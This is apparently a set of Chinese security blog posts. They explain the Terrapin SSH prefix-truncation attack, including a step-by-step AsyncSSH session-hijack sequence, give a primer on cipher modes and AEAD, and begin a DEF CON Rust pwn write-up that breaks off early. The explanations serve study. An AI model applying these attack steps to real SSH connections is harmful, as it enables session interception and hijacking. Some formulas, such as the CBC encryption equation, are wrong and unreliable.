这个漏洞是由这边的几个安全研究员提出的漏洞。这个漏洞是一个基于MITM（Man-in-the-Middle 中间人，下文简称MITM）的攻击，这意味着，这个漏洞攻击的场景至少要存在如下的场合:


+----------+      +----------+         +----------+
|          <------+          <---------+          |
| Alice    |      |   Evil   |         |  Bob     |
|          |      |          |         |          |
|          |      |          |         |          |
|          +----->|          +--------->          |
+----------+      +----------+         +----------+

这个漏洞是针对SSH的通信完整性发起的攻击，并且攻击者不具备对于会话相关密钥信息的知识，包含但不限于：

加密内容的密钥
MAC使用的nonce
IV

所以这个问题不是一个简单的内存泄露或者逻辑漏洞。同时该攻击的一个重要的攻击面在于降低了SSH的防护措施，突破了SSH的通信完整性，从而使得之前出现过的攻击能够重新被利用。

通信完整性定义

When a secure channel between A and B is used, the data stream received by B should be identical to the one sent by A and vice versa

说白了，双方的通信都必须能够明确知道来自对方，这就是通信完整性

如何算是对SSH发起攻击

首先在讨论上述攻击的时候吗，首先要明确目标。SSH协议设计的时候是以通信完整为前提进行设计的，此时SSH通信的时候能够保证信息的完整性(integrity)，这样就意味着其具备防御MITM的能力。
所以当SSH不再具备防御MitM攻击的时候，其实就可以认为对SSH完成了攻击。实际上，Terrapin提出的漏洞模型中，个人理解有一些仅需对SSH途径的路由进行控制，并且能进行Sniffer和重放，即可完成攻击。

SSH 历史问题

SSH历史上出现过很多问题，其中有几个比较有趣，这边就选取这几个进行讲解

SSH前置知识补充

SSH通信的大致流程如下：

其中，这种通信协议被称为Binary Packet Protocol BPP，也就是二进制通信协议。并且在这里给出几个基础定义：

Packet：网络数据发送的最小单位
Block：加密操作的最小单位

二者关系为：SSH的数据包以Packet为单位发送，每一个Packet中包含多个block。

Block0         Block1        Block2
+-------------+-------------+-------------+---
|   Length    |padding| Payload         
+-------------+-------------+-------------+---
Packet0

CVE-2008-5161 针对M&E的攻击

注意：这个问题其实在后来被证实为可能存在一定的问题，可能只有在某些理想化状态下能够使用。不过这个攻击实在是有趣，这边介绍一下这个攻击思路

这个漏洞是一片发在IEEE的文章提出来的，这里有链接
漏洞发生在ssh对于之前提到的M&E实现过程中的问题，属于是协议的级别的问题。由于SSH通信过程为加密过程，其不能无限制的接受数据包，所以其在进行数据解析的时候，会按照Block解密。然而就是在其进行解密前的安全检查中，形成了这个漏洞的利用点。接下来来看一下这些错误检查点：

SSH与出错审计

整个安全检查分为好多步骤，我们着重观察以下步骤

进行长度check

if (packet_length < 1 + 4 || packet_length > 256 * 1024) {
buffer_dump(&incoming_packet);
packet_disconnect("Bad packet length%d.",packet_length); 
}

这里的packet_length为从第一个数据包中解密的数据。这个检查用于防止写的过大导致的DDos问题。进行长度检测时，SSH允许的数据长度为[5,256 × 1024]之间。（这里注意很重要）

进行Block的check

need = 4 + packet_length - block_size

if (need % block_size != 0)
fatal("padding error: eed %d block %d mod %d", eed, block_size, need % block_size);

其中block_size会随着我们选择的加密算法变化而变化，但是总的来说为固定值且为8的倍数。这里的need表示仍然需要接受的数据长度；如果此时的数据不是对齐的状态，则此时认为传输数据有误，此时会放弃当前通信，而不进行数据返回

进行MAC的check

1 2	if (buffer_len(&input) < need + maclen) return SSH_MSG_NONE;

buffer_len(&input)表示此时接受了的数据长度，maclen则是在SSH协议中的SSH MAC中指定的一个长度，根据使用的MAC不同而变化，例如hmac-sha1的长度为20
如果这个Check不通过，SSH则会抛出一个叫做Corrupted MAC on input.的错误信息。

总结一下这几个check的行为，可以得出如下的现象：

检查内容	检查未通过行为
Packet Length	连接断开，并且发送一个错误信息
Block 是否对齐	连接断开
输入长度是否过长	返回错误信息
检查均通过	持续等待

SSH 中间人攻击

现在假设我们作为攻击者，能够从中间截获数据包。此时我们做出如下的假设

$K$ 为每一个block加解密使用的key
$F_K$ 为加密操作， $F_K^{-1}$ 为解密操作
$L$ 为Block Size（3ds中L=8， aes中L=16）
$p_i$ 为第i个明文block

对于CBC模式的加密算法，存在一系列的 $p_1,p_2,...p_n$ ，此时有:

c_i = F_K(p_i) {\oplus} c_{i-1}, i=1,2,...n

其中 $c_0$ 为IV，也可以是BBP 中获取的最后一个加密数据块 $c'_n$ 。
对于解密，则有

p_i = c_{i-1} {\oplus}F^{-1}_K (c_i), i=1,2,...n

前14bit猜测

我们假设作为攻击者，我们截获了一个加密数据包 $c^*_i$ ，此时我们有如下关系

p^*_i = c^*_{i-1} {\oplus}F^{-1}_K (c^*_i)

假设我们把这个数据包插入到下一个Packet的开头，此时我们假设

$c_n$ 为当前连接中，上一个packet的最后一个block。这个block本来是要作为IV被使用的

那么此时的解密流程如下

p'_1 = c_{n} {\oplus}F^{-1}_K (c^*_i)

综合上述算式，我们能得到

p^*_i = c^*_{i-1}{\oplus}p'_1{\oplus}c_n

由于我们为中间人，因此可以假设我们能获取所有的 $c_i$ 。假设当我们插入数据包之后，出现如下的状态：

状态一：SSH突然终止，没有出现任何错误信息
状态二：SSH开始等待更多的数据输入

这均说明，程序已经通过了前文提到的长度检测。也就是说， $p'_1$ 的长度范围符合要求，也就是前14bit的数据一定为0。那么根据

p^*_i = c^*_{i-1}{\oplus}p'_1{\oplus}c_n

就能获得当前的某个 $p^*_i$ 的前14bit

Q：怎么找到下一个连接开头呢？
A：虽然没办法直接观察到Packet开头，但是可以通过观察数据通过的情况来判断什么时候有新的Packet进来

所有bit恢复

假设我们通过block长度check，也就是进入上述的状态二，那么此时会持续的接受block，直到下面的判断不满足要求:

1 2	if (buffer_len(&input) < need + maclen) return SSH_MSG_NONE;

那么此时，我们就持续不断的插入[1,maclen]个数的 $L$ 长的blocks，观察ssh 触发MAC错误的那一刻。此时我们就能够根据我们发送的数据包，算出这个need的准确值。此时，这个 $p'_1$ 的完整值我们就能由这个公式得到:

1	need = 4 + packet_length - block_size

此时，根据上文推到的

p^*_i = c^*_{i-1}{\oplus}p'_1{\oplus}c_n

我们就能获得所有的明文信息！
根据总结，满足如下加密算法的传输都能够被这种方式进行攻击:

加密数据包中使用了长度字段
使用CBC的加密模式
允许攻击者少量传输数据
在不同的数据包错误下，返回不同的错误信息

攻击场景

实际上，SSH也不可能允许一个用户反复的执行上述操作，其必将导致连接中断。但是，我们可以根据某些已知位置的数据进行攻击。例如，用户在进行远程登陆的时候，我们只需要将ssh通信过程中登录密钥相关逻辑进行破译，并不需要获取整个ssh通信数据。

侧信道攻击

这个攻击其实比较神奇，但是神奇之中透露着合理。这也是来自一篇USENIX的论文。论文提到说，人们在敲击键盘的时候，会有一定的倾向性。某些特定的字符或者字符组合敲击的时候，时间间隔可能会变得很长或者很短。

那么，通过观察数据包的特定格式，就能够猜测此时的输入内容。例如上述的通信中，通过传输数据的长度特征，就能推断出是否是正在输入SU指令，以及猜测当前用户的输入长度。有些时候还能够通过一些特殊的观察看到额外的值。这边要给出作者之前打比赛遇到过的一道题，在这个题目中，虽然给出的是SSH的加密后数据包，并且给出了keylog，但是其实log中存在数据修改。通过一个叫做packetStrider的脚本，实际上在加密状态下，根据数据包特征依然能准确的获取部分特定的输入内容（例如回车，或者删除）。这篇论文似乎也是提出了一个类似的方案。（不过具体内容太长，没有深入理解）这边贴出一个分析Terrapin-Attack的博客，这其中提到了在未提供防护的情况下，SSH数据包的特征：

可以看到，在未使用防护技巧的时候，SSH的数据包时间间隔和数据大小是有明显差异的，而在SSH新修复的场景中

可以看到，时间间隔变成一致的。这是因为SSH提供了一种基于时间的混淆技巧，从而让数据包的传输没有时间特征，从而避免了侧信道

Terrapin Attack

好了，完成了之前那么多的前情提要，终于可以开始介绍这个攻击了。这个攻击针对的是SSH握手阶段发起的，这边要仔细介绍一下SSH的握手阶段发生的事情：

SSH握手阶段

SSH从握手到建立加密通信信道的流程如下:

其中黑色的部分表示当前信道已经是加密信道了，从黑色部分开始，中间人就完全无法解析SSH通信的具体内容。

上图有几个细节：

SSH使用的是前文提到的二进制包协议（Binary Packet Protocol，之后简称BPP）
Client和Server端的序列号都从0开始计数
通信在Newkeys之后才正式进入加密处理

SSH加密的时候，会交换加密中用到的密钥，以及用于保护秘密信息的nonce。注意这里的SSH通信过程中，使用的一般是椭圆曲线的交换方式，也就是使用形如 $(g^x)^y mod D =(g^y)^x mod D$ 的特性，完成密钥 $K=g^{x*y}$ 以及一些必要的nonce等数据的获取。
这里生成的MAC值适用于检查信息的完整性，然而单纯生成普通的MAC值（例如，对明文进行hmac计算），攻击者很容易的就能使用各种方法对数据进行伪造。此时就需要引入刚刚提到的nonce数据，以及计数器Counter。
SSH会使用Snd 和 Rcv两种不同的counter，前者会在发出数据包的时候自增，用于计算发出的数据包的MAC；后者会在接收到数据包的时候自增，用于验证数据包的MAC，从而保证信道不被篡改。
由于SSH是基于TCP协议的，所以被认为是不发生丢包的稳定通信，因此使用的counter为隐式counter。

KEXINIT

在KEXINIT阶段（如图未加密），SSH会使用椭圆加密等手段进行nonces以及支持的算法列表进行交换。这里交换的四条算法列表包括

用于密钥交换的算法列表
用于服务端签名的算法
双边各使用的加密算法

KEXDHINIT

此时使用Diff-Hellman密钥交换算法进行数据交换。（也有可能使用ECDH或者PQC等算法）服务端会使用握手阶段中的数字签名对此时的数据信息进行校验。这个数字签名为之前提到的那些信息以某种固定的顺序进行计算的结果。

交换用hash：仅对部分数据校验

这里提到的数字签名只会对通信数据中的部分数据进行计算。具体来说，这个hash如下:

H=HASH(V_C ||V_S||I_C||I_S||K_S||X||K)

这些值含义如下：

HASH：一种hash算法
$V_C V_S$ 客户端服务器端的版本信息
$I_C I_S$ 发生在KEXINIT阶段的基本信息
$K_S$ 来自服务器端的公钥
$K$ 密钥交换得到的私钥
$X$ 一个由多个密钥值决定的数值

上述的每一个值都有一个编码定义的长度域
注意，这里并没有把形如IGNORE MESSAGE这类消息，或者其他的消息进行编码。这就给MitM创造了机会

序列码

为了对每一个数据包进行唯一性标记，这里使用了Snd和Rcv两种序列码共同标记。注意，在前几个序列中并不适用MAC对发送数据进行校验，而是等整个安全信道建立的时候，MAC才会参与数据校验。并且此时发送端的Snd必须要和接收端的Rcv相等，否则会直接抛弃当前数据包

Terrapin Attack 攻击细节

文章提出的是一种叫做prefix truncation attacks前缀截断攻击的一种攻击形式。这个攻击核心即为:

The SSH Binary Packet Protocol is not a secure channel because a MitM attacker can delete a chosen number of integrity-protected packets from the beginning of the channel in either or both directions without being detected

攻击的核心在于能够删除SSH通信过程中的Counter Number，从而能够突破其完整性校验，然后强迫SSH使用低安全性的加密算法，完成完整的漏洞攻击流程。在攻击中，会使用如下的术语：

IGNORE数据包：在SSH中，部分协议支持使用IGNORE数据包，即由一方发往另一方，但是无需对方回显的数据包
UNKNOWN数据包：在SSH中，如果当前数据包格式正常，但是却无法识别其类型，那么就会当成UNKNOWN数据包，对放则会回复一个UNIMPLEMENT的数据包作为回应
$IV_{kdf}$ ：派生密钥，也就是例如CBC模式中，IV，或者 $Enc(p_i)$ 那个值，就叫做派生密钥

核心漏洞成因

这个漏洞的核心成因为如下两点：

未对握手阶段进行仔细校验。SSH在握手阶段使用了一个签名来校验完整性，但是并没有对所有的副本进行校验，而只是校验了某一个特定序列的信息
SSH的安全会话序列号是从握手阶段开始算起的，而非建立起真正的安全信道的时候。这就会导致，在安全信道真的建立起来之前的序列号本质是不受到保护的

通过上述结论，我们可以使用如下的方式对目标进行攻击

修改序列数

通过在握手阶段插入一个数据包，我们可以增加Rcv的计数器。换句话说，攻击者可可以动态的修改这个Snd和Rcv值

BBP上进行前缀截断攻击

核心攻击技巧：攻击者可以通过使用序列号控制来动态的删除一个安全信道建立之初的数据包

在SSH通信过程中，如果接收方的Rcv与发送方的Snd不匹配，此时就会抛弃这个数据包。这个攻击就是利用了这个机制，使得SSH会将关键的数据包进行抛弃。
通过上述操作，可以发动如下的攻击：
1. BBP上进行多段前缀截断攻击
攻击者可以通过往Client或者Server段一次性发送多个特殊的IGNORE数据包，从而引发多个数据包丢失，造成多段截断攻击。

2. 扩展协议降级攻击
在SSH通信中，会使用EXTINFO来标注当前的SSH支持的扩展协议。然而攻击者可以通过丢弃这个EXTINFO，造成Extension Negotiation，迫使安全信道降级，让服务端以为客户端无法支持这几年的安全的协议，从而迫使服务端改用可以被键盘输入时间攻击keystroke timing attack的老旧协议

3. 恶意扩展攻击和恶意会话攻击
在例如AsyncSSH这类SSH实现端上。当攻击者拥有受害者的用户名的时候，可以通过插入一个带有用户认证信息的数据包，此时受害者会直接登陆到攻击者的shell环境上，实现整个会话的劫持。

适用范围

攻击对于ChaCha20Poly1305这种AEAD的加密方式比较好，因为其使用的是近似于EtM的完整性校验（实际上更为松散），同样可以用于部分CBC-EtM模式中。但是，CBC-EaM,CTR-EaM,GCM这三种模式都是不受到这个攻击影响的。
理由：
这个理由牵扯到我们上一篇文章提到的AEAD的加密方式。因为这个攻击牵扯到遗弃数据包的动作，当我们尝试丢弃数据包的后，EaM这种完整性校验会察觉到数据包被丢弃，而EtM则有可能不会，因为EaM其实是对明文做的完整性校验，而EtM其实是对密文做的完整性校验，尤其ChaCha20Poly1305这种算法，它将序列号也放在了派生密钥的过程中，这样就意味着， $Key_4$ 就只能解开 $Snd_4$ 的数据包，这与我们想法一致，丢弃数据包的动作完全不会影响它的解密。

CBC-EtM 与出错处理

实际上，某些算法中的EtM未就能够绕过check，例如CTR-EtM中，由于Counter的介入，当我们丢弃数据包的时候，Counter会发生错位，从而导致出错。所以，这里特指CBC-EtM。而CBC-EtM也并非完全可靠。我们举个例子，在CBC加密模式下，明文计算公式为:

p_1 = Dec(c_1){\oplus}IV_{kdf}

那么假设此时，我们使用扩展协议降级攻击，使得前面k个数据包丢失，那么此时的计算为：

p'_1 = Dec(c_{k+1}){\oplus}IV_{kdf}

此时我们的p1值就是未知的了，而且可能是无效的。然而根据CBC的特性可知，此后的值都是没问题的：

p'_2 = p_{k+2} = Dec(c_{k+2}){\oplus}c_{k+2}

所以这里就产生了一个疑问，SSH究竟会如何处理这个可能有问题的数据包呢？这里有三种可能：

数据包出错过于离谱，直接将数据包抛弃
数据包虽然出错，但是关键部分的数据是可以识别的，此时SSH会将这个包当作正常的数据包进行使用
数据包虽然能解析，但是无法解析，此时将数据包视为UNKOWN数据包，并且给出UNIMPLEMENT回显

接下来，就会展示一些可能的攻击场景，描述当前攻击的可行性

具体实例： ChaCha20-Poly1305

SSH算法会在NEWKEYS阶段后，建立加密隧道，并且在加密信道中发送EXTINFO相关信息，提供一些扩展加密策略，从而防止各种形如keystroke timing attack的攻击策略。此时我们可以使用单个包的丢失阶段技巧后，可以使其丢弃对应的扩展加密策略，从而迫使其使用不太安全的通信策略：

具体实例： CBC-EtM.

此攻击同样是逼迫SSH丢弃EXTINFO相关信息。然而正如前文所说，对于类似CBC这种模式，其解密逻辑原先如下:

P_1 = IV{\oplus}Dec(C_1)

如果我们用IGNORE丢弃一个数据包的话，数据会变成

P_1(?) = IV{\oplus}Dec(C_2) \\ P_2(?) = IV{\oplus}Dec(C_3) \\ ...... \\ P_i(?) = IV{\oplus}Dec(C_{i+1})

这样有生成的所有密文都会被影响，从而使攻击失效。于是此时我们可以使用另一种策略强行让其丢弃EXTINFO，那就是使用一种服务器无法解析的UNKNOWN信息。此时服务端返回UNIMPLEMENT。这种办法可以迫使Server端使用UNIMPELEMENT数据包替换EXTINFO，这样办法就能保证往后的密文解析没问题

如图，首先通过在Client端发送UNKNOWN，使其能够保持对齐，然后通过在合适位置往Server端插入UNKNOWN信息，即可保证在通信过程中依然能够截获EXT_INFO。然而UNIMPLEMENT信息通常较短，可能会导致数据错位（没能填满Block，或者因为EXT_INFO导致错位等等）使得数据解密发生错误。然而，在部分SSH客户端中，我们可以使用PING-PONG包代替这种包，通过在PING数据包中塞入大量的数据，此时返回的PING将很有可能能够符合SSH客户端接受数据的要求，此时准确率就会提升非常多

具体攻击 AsyncSSH

如果说之前的说法都是理论上的泛泛而谈，这边就要举一个实际的例子：asyncssh，这个库是一个python里面的有名的库。并且其就受到这种攻击的影响。这里介绍两种实际的攻击形式

恶意使用`EXTINFO`

这里的打法和ChaCha20-Poly1305类似，不过将IGNORE替换成了指定的EXTINFO。理论上来说，EXTINFO应该在加密信道中进行接收，但是AsyncSSH可以接受任何时候发送的EXTINFO，于是配合前面提到的前缀截断攻击，可以将原先的安全的SSH协议替换成我们指定的SSH协议

劫持SSH会话，要求有一个能够SSH的用户信息

这种攻击需要攻击者在这个SSH服务端上也有一个登陆凭证。这种攻击能够让用户以攻击者指定的用户登录，但是毫无察觉。在这种场景下，攻击者能轻易的获取受害者的所有输入，甚至作为一个伪造的SSH Agent存在。这种攻击如图

首先在客户的NEWKEYS之前，插入一个USER_AUTHREQUEST请求，这个请求中包含了攻击者指定的认证信息（最好使用password或者publickey机制）。此时，AsyncSSH的服务器端会认为其接收到了认证信息，但是由于还没有完成握手机制（NEWKEYS未完成），所以其仍会等待对应的流程完成。之后用户端发起SERVICE_REQUEST，要求进行认证后，服务端此时发送SERVICE_ACCEPT，表示可以进行认证。然而我们之前已经伪造了一个USER_AUTHREQUEST请求，此时AsyncSSH的服务端会认为我们已经完成了请求，于是返回USERAUTH_SUCCESS，表示可建立通讯通道。

期间为了防止Client的正常行为从而导致攻击者的登录被取代，以及防止Client察觉，这里故意将真正的USER_AUTHREQUEST滞后，此时当服务器端返回请求后，攻击者再将这个请求发往对面。然而此时因为认为通道已经建立，这个登录请求就被抛弃了。

Q：为什么这个时候还要发送真正的USER_AUTHREQUEST呢？
A：因为丢弃数据会引发CBC-MtE解密错误，所以只能延后，不能丢弃

总结

这个攻击模型非常有趣，其中无论是利用SSH机制的部分，还是通过替换数据包 or 丢弃数据包从而绕过MAC完整性的办法都是非常有趣的地方。在今后的安全研究中，需要试着从不同的角度去考虑攻击场景以及防护场景，才能更好的对安全有一个广泛的认知。

Terrapin Attack 学习

2024-01-21T09:17:51.000Z

Terrapin Attack 漏洞是由这边的几个安全研究员提出的漏洞模型，这个漏洞有一阵子特别火，所以我特别想好好的研究一下，然而这个漏洞（的背景）相当的复杂，得从一些密码学相关的前置知识慢慢学习，这边先简单的把基础知识给过一遍

SSH 前置知识学习

整个加密中扯到了相当多的密码学知识，这边从一开始的部分开始讲起

密码学前置知识

加密算法本身在网上有非常多的优秀资料。这边仅对部分信息进行展开叙述。
以AES为例，AES的加密算法至今为止还是非常稳定的，然而这类算法称作块加密算法（与之相对的还有流加密算法），其作用的对象仅针对128bit|16bytes 192bit|24bytes 256bit|32bytes这三种长度的数据进行加密。而现实中待加密的数据总是非常的长，这就需要对原数据进行一定的处理。这种不同的处理方式通常称作块加密模式(Block cipher mode)，为了方便，在本文称作加密模式

加密模式

在讨论加密模式的时候，我们通常有以下约定俗称的称呼：

块（Block）：表示当前加密的最小单位
IV（Initialization Vector）：初始化向量，通常与一个Block长度相等。有时候也用于指代由密文生成的参与运算的向量
Padding：结尾的填充字符串
Nonce：随机数。这个词在讨论加解密的时候经常使用

Padding

当我们尝试对一个比较长的数据进行加密的时候，需要将数据按照Block大小切分。通常来说，切分的大小都是4字节对齐，然而我们输入的字符根本不能保证长度一定是4的倍数，这个时候程序往往会给数据的末尾增加一些字符用作Padding，例如:

1	ThisIsAPassword\0x01

其中，这里的\x01正好组成了字符串结尾的最后一个字符，并且这个字符数字是1，表示当前的字符的padding长度为1。这样当解密完成后，程序就会根据padding抛弃最后的字符，得到完整的字符串，上述例子中即为ThisIsAPassword。当然，这也只是一种约定，作为开发者也可以通过约定，告诉用户你的输入必须要满足为XX的倍数，否则就出错，我们提到的这种padding方式可以在RFC2040这里看到。

ECB（Electronic codebook）

根据前文可知，当遇到多余的字符时，可以使用padding来描述（或者直接要求用户输入为Block对齐）。那现在我们就需要一个方式来进行处理不同的Block，最简单的思路就是直接切分。例如下面的字符串:

1	FirstPartAAAAAAASecondPartBBBBBB

加密的时候，简单的分解成

1	FirstPartAAAAAAA SecondPartBBBBBB

这样进行加密即可。这种加密方式叫做电子密码本加密模式ECB(Electronic Codebook)。加密方式如下图:

加密的时候，使用同一个密钥key，将切割后的字符串进行加密。这种加密方法还有几个比较有趣的好处：

由于加解密同时发生，所以可以异步发生
加解密的时候可以从任意位置开始

其实在现实场景中，除了加密的可靠性，效率也是非常值得考虑的一点。甚至在某些场景下，牺牲一定程度的安全性也是可以被允许的，为了安全而抛弃效率其实是一种过于理想化的状态。

CBC（Chain Block Cipher）

然而，其实有心人稍加考虑就会发现ECB有许多问题：

当攻击者知道被加密的数据大致范围的时候，会很容的爆破
加密数据混淆程度不高

实际上，wiki中有给出ECB加密算法的一个极端例子：

可以看到，被ECB加密的图片能看到大致的形状。现实中，如果我们企图猜测某个用户输入的密钥，并且知道一个大致的输入范围的话，爆破起来将会非常快，此时的ECB模式就会失去应有的作用。
在这个背景之下，就提出了一种叫做链式块加密CBC的加密模式。这种模式的加密流程如下:

此时能看到其格式大致如下:

C_i = Enc(P_i{\oplus} C_{i-1})

其中当i=0的时候，有以下特殊情况

C_0 = Enc(P_0{\oplus} IV)

IV为需要用户指定的一个输入长度的字符。
这种加密方式与ECB相比，有以下几个好处：

第i个密文会受到前面i-1个所有密文的影响，这就导致特征变得不明显
即使密钥和明文一定，只要IV发生变化，密文也会发生变化
解密的时候，由于只依赖密文，所以解密步骤依然可以异步指型

此时，解密的时候则需要将上述的流程进行相反的处理：

P_i = Dec(C_i){\oplus} C_{i-1}

这种方式为一种比较主流的加密方式。然而其还是有一点缺点：

当解密的时候，IV出错只会影响第一个数据块（因为解密的时候，异或步骤依赖的是密文而非明文）
由于加密的时候依赖上一个状态，此时加密为非并行

PCBC（Propagating Chain Block Cipher）

上文提到，CBC有一个还算致命的问题，就是IV即使出错了，也只影响一个数据块。所以提出了一种新的加密方式：PCBC，这种方式的加密如图：

可以注意到，此时多了一个异或的操作。也就是说，加密算法改成了:

C_i = Enc(P_i{\oplus} C_{i-1}{\oplus}P_{i-1}),P_0{\oplus}C_0=IV

这样一来，只要IV出错，错误就可以传播给每一个密文。然而这样一改，又引入了新的问题：

由于强依赖上一个状态，此时的加解密都无法异步
相邻的密文块如果发生颠倒，此时的解密逻辑不受到影响

论证：
假设此时存在三个block，分别为0，1，2.此时已知

C_2 = Enc(P_2{\oplus}C_{1}{\oplus}P_1) \\ C_1= Enc(P_2{\oplus}C_{0}{\oplus}P_0)

则

P_2 = Dec(C_2){\oplus}C_1{\oplus}P_1 = Dec(C_2){\oplus}C_1{\oplus}Dec(C_1){\oplus}C_0{\oplus}IV

此时， $C_1$ 和 $C_0$ 顺序调换，并不影响最终答案。

这两条缺点非常明显。所以这个算法并没有特别流行

Cipher feedback (CFB)

这个算法不同于前面两个，并非是明文处理后参与AES这种加密算法，而是IV会参与到加密算法中，加密过程如图:

此时的加解密流程可以参考这个:

其与CBC模式很类似，也是加密的时候无法并行化，但是解密可以。

Output feedback (OFB)

加密算法类似CFB，区别在于IV使用的为加密后的临时状态，而非加密完成后的C:

此时的加解密流程可以参考这个:

同样由于加密过程依赖上下文，所以不能进行并行加密。

CTR（Counter） mode

可以看到，前文提过的加密算法（除了ECB）都有一个比较麻烦的问题：不能并行化。曾经和做密码学的朋友聊过，密码学算法除了加解密的安全性外，其实效率也是非常重要的一环。如果效率不行的情况下，某些所谓的安全信道将会花费大量的时间，这就会导致很多加密算法无法投入到实际生产中。于是这里提出了一种既能够保证安全性，又能并行加密的算法。
这种算法的模式如下：

其中，Counter会组成一个IV，这个IV的大小为每一个Plaintext Block 的大小。每一个Plaintext Block都有一个单独的IV。
首先这里生成一个随机数Nonce，并且使用任意一种可逆算法F，将随机数和counter组合，形成IV，形如

IV_i = F(Nonce, Crt_i)

之后，将这个单独的IV与Key放入对应的块加密算法中，最后用这个加密的到的数值和明文异或。

C_i = P_i {\oplus} Enc(Key, IV_i)

由于其孤立性的特点，CTR mode的加密算法允许算法进行并行化执行。

MAC 与 AEAD

随着时代的发展，安全攻防也在升级。很多攻击者不但直接对加密算法本身下手，有时候也改而转向对整个通信过程下手，考虑通过截断，丢弃，甚至篡改数据包，起到对数据进行劫持攻击的效果。这种时候，就对加密算法提出了新的需求，即是需要能够保证当前的加密后的数据不被篡改，于是提出了MAC和AEAD的概念。

MAC(Message Authentication Codes)为一种用于保证通信信道完整性的代码。这种能够保证通信过程不被监听的通信方式叫做Authenticated Encryption认证加密。认证加密能够保证通信的机密性和真实性。
通俗来说，就是保证以下两点：

不用密钥解开就不知道通信的内容，又叫做隐私性
这个加密只有通信双方能做到，第三者无法伪造同样的内容

为了能够保证上述两点，这种加密过程中会带有一个用于表示认证的标识authentication tag（AD）。这种数据保证其数据的完整性，同时不被加密，例如网络请求头中存放请求的目标地址。尽管所有的路由都能获得这个地址，但是中途的请求路由却没有一个能获取对应的key。这种带有请求就叫做 authenticated encryption with associated data(AEAD)。

AE 加密流程

这种AE（Authentication Encryption）加密流程如下

输入参数：

明文
密钥
可选的头部，例如附加认证信息或者关联数据

输出参数：

密文
认证标记

解密流程如下

输入参数：

密文
密钥
可选头部
认证标记

输出参数：

明文
如果tag无法认证密文或者附加头部，则抛出错误

常见的AEAD加密模式

规范化后的AEAD模式分为这几种

Encrypt-then-MAC (EtM) 加密后添加MAC

这种加密方式是唯一完全符合AE安全标准的。注意这种加密中，两个key一定要是分离的，否则依然会带来认证绕过的风险

Encrypt-and-MAC (E&M) 同时获得密文与MAC

遇上一个的区别是，此时MAC基于明文形成，并且只存在一个密钥，这种方式在某些特定的加密模式下会导致某种变种的Padding Oracle攻击，详见Plaintext Recovery Attacks Against SSH
概括来说，就是早年的SSH在做出错检查的时候，如果MAC值不对的时候，会发送一个区别其他消息的错误信息。

MAC-then-Encrypt (MtE) 先获取MAC，然后获得明文

首先基于明文生成MAC，然后将明文和MAC一同加密，获得密文。虽然看起来和上面的加密手法是一致的，所以同样也有Padding Oracle的问题，其出现在历史上著名的针对TLS的攻击Lucky_Thirteen_attack

在过去，ssh会使用CBC模式对包含MAC的数据进行加密，叫做Encrypt-and-MAC，就是在加密内容的最后增添MAC值，这样就能够在，这就非常容易导致著名的Padding Oracle攻击，从而在加密状态下，泄露位于数据末端的MAC码，实现对请求过程的篡改。

Galois/Counter Mode (GCM)

这个算法将CTR的算法和认证算法结合。明文加密得到密文之后，再使用类似CBC的模式，生成对应的AuthTag。这里可以认为使用了EtA

总结

这篇文章大致上把密码学的一些基本概念过了一遍，之后在分析SSH漏洞的时候，会反复提及。

参考链接

https://datatracker.ietf.org/doc/html/rfc2040
https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation

defcon-rustpwn

2023-07-02T00:34:36.000Z

之前跟着战队尝试做了一个defcon的题目，又是一个rust pwn，而且非常有意思，这边记录一下整个做题过程

本文首发于奇安信攻防社区 https://forum.butian.net/share/2328

Rust Pwn – rest-and-attest

rest-and-attest

这个题又是一个Rust Pwn。拿到题目后，观察到有以下几个文件

├── bin
│   ├── launcher
│   ├── run_challenge.sh
│   ├── sfm
│   ├── uploader
│   └── wrapper.sh
├── lib
│   ├── libcrypto.so.3
│   ├── libc.so.6
│   └── libgcc_s.so.1
└── src
    ├── Cargo.lock
    ├── Cargo.toml
    ├── sfm
    │   ├── Cargo.toml
    │   └── src
    │       ├── lib.rs
    │       ├── main.rs
    │       └── sfm_proto.rs
    ├── sfm-sys
    │   ├── build.rs
    │   ├── Cargo.toml
    │   ├── src
    │   │   └── lib.rs
    │   └── vendor
    └── uploader
        ├── Cargo.toml
        └── src
            ├── main.rs
            └── trusted_firmware.raw

首先根据文件目录，我们知道我们有一个uploader项目，一个sfm项目，一个辅助sfm项目的sfm-sys。基本上对应了bin目录下给出的相关二进制。然而，给出的二进制还包含了一个launcher，这个是没有源码的。这里run_challenge.sh和wrapper.sh脚本内容如下:
run_challenge.sh

#!/bin/sh

# simulates challenge running in production environment
socat tcp4-listen:4444,reuseaddr,fork exec:"./wrapper.sh"

wrapper.sh

#!/bin/sh

exec 3<&- 4<&-

exec ./uploader

可以看到，程序入口就是uploader。

程序入口Uploader

我们先简单看一下uploader的逻辑。比较重要的如下:

fn io_loop() -> Result<(), Box<dyn Error>> {

    let mut image = include_bytes!("trusted_firmware.raw").to_vec();

    loop {
        let mut line = String::new();

        print!("> ");
        stdout().flush()?;
        stdin().read_line(&mut line)?;

        let command = line.trim();
        if command == String::from("upload") {
            image = get_new_image()?;
        } else if command == String::from("download") {
            do_download(&image)?;
        } else if command == String::from("run") {
            run_device(&image)?;
        } else if command == String::from("quit") {
            break;
        } else {
            println!("Invalid command {:}", command)
        }
    }

    Ok(())
}

这里四个逻辑，分别是：

上传一段shellcode二进制程序
下载现有的shellcode二进制
使用launcher运行对应的shellcode
退出

这里如果我们不上传的话，会使用默认的trusted_firmware.raw。这个shellcode存放在sfm这个项目的src中。
当我们执行了run指令，程序会做出如下操作:

fn run_device(image: &Vec<u8>) -> Result<(), Box<dyn Error>> {

    let (mut sfm_child, client_sock) = launch_sfm()?;

    let mut temp_file = NamedTempFile::new()?;
    temp_file.write_all(&image[..])?;

    let temporary_path = temp_file.into_temp_path();

    let duped_fd = unsafe {
        match libc::dup(client_sock.as_raw_fd()) {
            -1 => Err(IoError::last_os_error()),
            new_fd => Ok(new_fd)
        }?
    };

    let mut fw_child = process::Command::new(LAUNCHER_PATH)
                                        .args([&temporary_path])
                                        .env("SFM_FD", duped_fd.as_raw_fd().to_string())
                                        .spawn()
                                        .expect("failed to execute emulator");

    fw_child.wait().expect("emulator wasn't running");

    sfm_child.kill().expect("was not running");

    Ok(())
}

流程大致如下

首先程序会尝试启动sfm程序，并且获得子进程对象，以及创建一个client_sock的通信句柄，这个句柄对应的server_sock会传入sfm，与sfm进行交互
程序会启动launcher这个程序，这个程序会使用client_sock通信句柄
我们之前上传的image（也就是shellcode）会作为启动选项的参数

上传沙箱Launcher

这个程序是一个C写的程序，最关键的地方如下:

